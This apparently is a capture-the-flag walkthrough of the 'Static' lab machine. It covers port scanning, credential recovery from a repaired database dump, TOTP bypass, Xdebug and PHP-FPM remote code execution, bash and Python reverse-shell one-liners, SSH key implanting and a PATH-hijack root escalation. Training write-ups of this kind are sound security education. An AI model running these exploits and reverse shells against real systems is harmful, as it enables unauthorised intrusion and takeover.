Static
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.246 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Mon Sep 19 23:24:24 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN secondScan 10.10.10.246
Nmap scan report for 10.10.10.246
Host is up (0.047s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
2222/tcp open EtherNetIP-1
8080/tcp open http-proxy
# Nmap done at Mon Sep 19 23:25:04 2022 -- 1 IP address (1 host up) scanned in 39.76 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,2222,8080 10.10.10.246 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Mon Sep 19 23:25:26 2022 as: nmap -sCV -p22,2222,8080 -oN secondTargeted 10.10.10.246
Nmap scan report for 10.10.10.246
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 16:bb:a0:a1:20:b7:82:4d:d2:9f:35:52:f4:2e:6c:90 (RSA)
| 256 ca:ad:63:8f:30:ee:66:b1:37:9d:c5:eb:4d:44:d9:2b (ECDSA)
|_ 256 2d:43:bc:4e:b3:33:c9:82:4e:de:b6:5e:10:ca:a7:c5 (ED25519)
2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
| 256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_ 256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
8080/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-robots.txt: 2 disallowed entries
|_/vpn/ /.ftp_uploads/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 19 23:25:55 2022 -- 1 IP address (1 host up) scanned in 29.35 secondsThe SSH services on ports 22, and 2222, look like are hosted in different systems. Could be different containers. Website on port 8080 shows an empty page. But nmap detected a robots.txt file with two entries.
The /.ftp_uploads/ directory has two files.
The warning.txt file says that some files might be corrupted.
The db.sql.gz file looks like a GZIP compressed file.
file db.sql.gz
db.sql.gz: gzip compressed data, was "db.sql", last modified: Thu Jun 18 15:43:42 2020, from Unix, original size modulo 2^32 355But it looks like the file is corrupted.
gzip -d db.sql.gz
-ddecompress file.
gzip: db.sql.gz: invalid compressed data--crc error
gzip: db.sql.gz: invalid compressed data--length erroExploitation
There is a tool called fixgz, which you can download from here, which allow us to fix a corrupted .gz file.
git clone https://github.com/yonjar/fixgz
cd fixgz/
gcc fixgz.cpp -o fixgz
Let's fix the corrupted file.
fixgz db.sql.gz db.sql.gz.fixed
Now, we could read its content with zcat.
zcat db.sql.gz.fixed
CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsigned not null auto_increment, username varchar(20) not null, password varchar(40) not null, totp varchar(16) not null, primary key (id) );
INSERT INTO users ( id, username, password, totp ) VALUES ( null, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997', 'orxxi4c7orxwwzlo' );We get the password hash of the admin user. The password for that SHA1 hash is admin, as we can see in crackstation. Note that we also see a TOTP key, which might be valuable later.
On the other hand, the /vpn/ directory shows a login page, and the credentials that we found seem to be valid.
But, it asks for an OTP number, because 2FA is enabled.
I wrote the following script, which will give the correct OTP number, synchronizing the time, and using the TOTP key.
#!/usr/bin/python3
import pyotp
import ntplib
from time import ctime
client = ntplib.NTPClient()
response = client.request("10.10.10.246")
totp = pyotp.TOTP("orxxi4c7orxwwzlo")
print(totp.at(response.tx_time))Now, we are able to log in.
python getToken.py
022725
The website shows a list of servers with their IP addresses and their status.
If we enter something on the Common Name field, and press on Generate, we'll download a .ovpn file.
The VPN file won't work because it is trying to connect to vpn.static.htb.
openvpn test.ovpn
...
2022-09-20 18:34:40 RESOLVE: Cannot resolve host address: vpn.static.htb:1194 (Name or service not known)
...Let's add the domain name to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.246 vpn.static.htbNow, we can connect to the VPN.
openvpn test.ovpn
...
2022-09-20 18:37:37 Initialization Sequence CompletedNote that we have a new IP address on the interface tun9.
ip a
...
10: tun9: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 172.30.0.9/16 scope global tun9
valid_lft forever preferred_lft forever
inet6 fe80::4d88:26ab:dbee:9517/64 scope link stable-privacy
valid_lft forever preferred_lft foreverLet's use the bnmap tool, which you can download from here, to check for open ports on the hosts that we saw on the website. First, put the IP addresses of the other servers in the hosts file.
nano hosts
172.17.0.10
172.20.0.10
172.20.0.11
172.30.0.1
192.168.254.3Now, scan those IP addresses through the tun9 interface.
bnmap.sh -f hosts -i tun9
-fscan networks and/or hosts in file.-iscan interface.
_
| |__ _ __ _ __ ___ __ _ _ __
| '_ \| '_ \| '_ \ _ \ / _\ | '_ \
| |_) | | | | | | | | | (_| | |_) |
|_.__/|_| |_|_| |_| |_|\__,_| .__/
|_|
-------------@alfa8sa--------------
-----------------------------------
[*] Scanning open ports for 172.17.0.10
[#########################] 100% (10000 / 10000 ports)
-----------------------------------
[*] Scanning open ports for 172.20.0.10
[!] Port open: 172.20.0.10:22
[!] Port open: 172.20.0.10:80
[#########################] 100% (10000 / 10000 ports)
-----------------------------------
[*] Scanning open ports for 172.20.0.11
[!] Port open: 172.20.0.11:3306
[#########################] 100% (10000 / 10000 ports)
-----------------------------------
[*] Scanning open ports for 172.30.0.1
[!] Port open: 172.30.0.1:22
[!] Port open: 172.30.0.1:2222
[#########################] 100% (10000 / 10000 ports)
-----------------------------------
[*] Scanning open ports for 192.168.254.3
[#########################] 100% (10000 / 10000 ports)As we can see, we don't have connection with the pub and pki server, the db server has an SQL service exposed, the web server has both SSH and HTTP exposed, and the vpn server has the same services as the main machine. Let's take a look at the website in the web server. First, to reach the container, add an ip route.
ip route add 172.20.0.10 dev tun9
The vpn/ directory shows the same login page saw earlier. And the info.php file shows the default PHP info page.
At some point, you'll see that the xdebug functionality is enabled.
There is a way to get Remote Command Execution in the machine using xdebug.
#!/usr/bin/env python2
import socket, signal, sys, re
from base64 import b64decode
def def_handler(sig, frame):
print("\n\n[!] Quiting...\n")
sys.exit(1)
#Ctrl+C
signal.signal(signal.SIGINT, def_handler)
ip_port = ('0.0.0.0', 9000)
sk = socket.socket()
sk.bind(ip_port)
sk.listen(10)
conn, addr = sk.accept()
while True:
client_data = conn.recv(1024)
response_b64 = re.findall(r'CDATA\[(.*?)\]', client_data)[0]
try:
output = b64decode(response_b64)
print(output)
except:
None
data = raw_input ('>> ')
conn.sendall('eval -i 1 -- %s\x00' % data.encode('base64'))Let's execute the script with Python 2.
python2 exploit_shell.py
To trigger the exploit we'll have to make a GET request.
curl 172.20.0.10/info.php?XDEBUG_SESSION_START=alfa8sa
Now, we are able to execute commands on the system.
>> system("whoami")
www-dataLet's get a reverse shell. First, set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Now, send a reverse shell from the web server to our local machine, with the IP address of the VPN. We'll get the reverse shell as the www-data user, and we'll be able to grab the user flag.
system("bash -c 'bash -i >& /dev/tcp/172.30.0.9/4444 0>&1'")
listening on [any] 4444 ...
connect to [172.30.0.9] from (UNKNOWN) [172.30.0.1] 44844
bash: cannot set terminal process group (37): Inappropriate ioctl for device
bash: no job control in this shell
www-data@web:/var/www/html$ whoami
whoami
www-data
www-data@web:/var/www/html$ cat /home/user.txt
cat /home/user.txt
c3f343befcac5fa92fb5373456e94247Privilege Escalation
To get a more comfortable shell, let's create a new pair of SSH keys on our local machine.
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:BB525izsjrcx4YURZ4Alw/RcnBBo+qu/GliJ9DGavw4 root@alfa8sa
The key's randomart image is:
+---[RSA 3072]----+
| o++X=*. |
| =O %o |
| . = B + |
|..=.o. = |
|.ooo + S |
| o. .+ o |
|.E....* |
| ..o. + |
| +*o.. |
+----[SHA256]-----+Copy the public key.
cat id_rsa.pub | xclip -sel clip
And put it in the authorized_keys of the www-data user.
echo "ssh-rsa AAAA...Nx/7E= root@alfa8sa" >> /home/www-data/.ssh/authorized_keys
Now, we are able to log into the machine through SSH without having to give any password.
ssh www-data@10.10.10.246 -p 2222
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.19.0-17-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Mon Jun 14 08:00:30 2021 from 10.10.14.4
www-data@web:~$ whoami
www-dataIf we check the network interfaces, we'll see that the web server has two interfaces, apart from the local one.
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.20.0.10 netmask 255.255.255.0 broadcast 172.20.0.255
ether 02:42:ac:14:00:0a txqueuelen 0 (Ethernet)
RX packets 10361 bytes 782008 (782.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10371 bytes 744940 (744.9 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.254.2 netmask 255.255.255.0 broadcast 192.168.254.255
ether 02:42:c0:a8:fe:02 txqueuelen 0 (Ethernet)
RX packets 28 bytes 10641 (10.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9 bytes 628 (628.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 20 bytes 1055 (1.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20 bytes 1055 (1.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0And from this container we have connection with the pki server.
ping -c 1 192.168.254.3
-cnumber of ICMP packets.
PING 192.168.254.3 (192.168.254.3) 56(84) bytes of data.
64 bytes from 192.168.254.3: icmp_seq=1 ttl=64 time=0.209 ms
--- 192.168.254.3 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.209/0.209/0.209/0.000 msLet's transfer with scp the bnmap.sh script to the web server, to be able to scan the pki server.
scp -P 2222 bnmap.sh www-data@10.10.10.246:/tmp/bnmap.sh
Now, give the script the right permissions, and scan the pki server.
chmod +x bnmap.sh
./bnmap.sh -p 192.168.254.3
_
| |__ _ __ _ __ ___ __ _ _ __
| '_ \| '_ \| '_ \ _ \ / _\ | '_ \
| |_) | | | | | | | | | (_| | |_) |
|_.__/|_| |_|_| |_| |_|\__,_| .__/
|_|
-------------@alfa8sa--------------
[*] Scanning open ports for 192.168.254.3
[!] Port open: 192.168.254.3:80
[#########################] 100% (10000 / 10000 ports)Only port 80 is open. Let's exit the current SSH shell, and log in again, but doing port forwarding of port 80 of the pki server.
ssh www-data@10.10.10.246 -p 2222 -L 80:192.168.254.3:80
Now, we can access the HTTP server of the pki server by accessing port 80 on our local machine.
There is not much going on the website. But if we check the HTTP headers, we'll see that the website is running PHP-FPM/7.1.
curl http://127.0.0.1/index.php -I
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 20 Sep 2022 17:32:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP-FPM/7.1There is a python script, which you can download from here, which exploits PHP-FPM, and allow us to execute commands on the system.
python exploit.py --url http://127.0.0.1/index.php --verbose
...
[*] RCE successfully exploited!
You should be able to run commands using:
curl http://127.0.0.1/index.php?a=bin/ls+/Now, we are able to run commands on the system.
curl -s -G -X GET "http://127.0.0.1/index.php" --data-urlencode "a=/usr/bin/whoami" | awk "/' -/,/: cannot open/" | sed "s/' -//g" | grep -v cannot
www-dataTime to get a shell. As we can only catch the reverse shell from the web server, we'll have to transfer the nc binary, which you can download from here, to the web server.
scp -P 2222 ncat www-data@10.10.10.246:/tmp/ncat
Now, set a netcat listener on port 4444.
/tmp/ncat -lvnp 4444
I will run a one-liner reverse shell in python. Then, we'll catch a reverse shell from the pki server.
curl -s -G -X GET "http://127.0.0.1/index.php" --data-urlencode "a=/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.254.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Ncat: Version 6.49BETA1 ( http://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.254.3.
Ncat: Connection from 192.168.254.3:54528.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname -I
192.168.254.3
$ hostname
pkiLet's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
51 236And set the proper dimensions in the victim machine:
stty rows 51 columns 236
At this point, I started enumerating the machine looking for ways of becoming the root user, but I couldn't find anything until I listed the capabilities.
getcap / -r 2>/dev/null
-renables recursive search.
/usr/bin/ersatool = cap_setuid+eipThere is one binary with the cap_setuid capability. Let's transfer pspy to the pki server, and execute the binary to see what it is doing. First, transfer it to the web server.
scp -P 2222 pspy64 www-data@10.10.10.246:/tmp/pspy
Now, log in again into the web server, and set a simple HTTP server on port 1234 with python in the /tmp directory.
ssh www-data@10.10.10.246 -p 2222
cd /tmp
python3 -m http.server 1234
As the pki machine doesn't have tools such as wget or curl to download pspy from the web server, we'll have to make our own curl function. Copy the following function, and paste it in the terminal.
function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}Now, download pspy from the web server using the custom curl function.
__curl http://192.168.254.2:1234/pspy > pspy
chmod +x pspy
Now, if we run pspy, and then on another shell we run the ersatool binary.
ersatool
help
create|print|revoke|exit
# create
create->CN=testing
client
dev tun9
proto udp
remote vpn.static.htb 1194
...The tool looks like it's creating the VPN file we used at the begging of the machine. But, we can see with pspy, that the binary runs with the UID=0, which means that runs as root, and it is using relative paths with some commands.
2022/09/20 18:05:16 CMD: UID=0 PID=2045 | openssl versionWe could exploit a path hijacking vulnerability to set the SUID permission to the /bin/bash binary. First, make a file called openssl in the /tmp directory with the following content, and give it execution permissions.
echo "chmod u+s /bin/bash" > /tmp/openssl
chmod +x /tmp/openssl
Now, modify the $PATH variable, so that the /tmp directory is the first one.
export PATH=/tmp:$PATH
Now, run the ersatool binary, and enter some random CN.
ersatool
# test
create|print|revoke|exit
# create
create->CN=testing
...Now, as the /tmp directory is the first one in the $PATH variable, the binary has executed the openssl script we made as root.
2022/09/20 18:14:28 CMD: UID=0 PID=2077 | chmod u+s /bin/bashFinally, if we execute bash as root, all we have to do is reap the harvest and take the root flag.
bash -p
bash-4.4# whoami
root
bash-4.4# cat /root/root.txt
b3298f99ac5999202090829ed5fa9fb6Last updated
Was this helpful?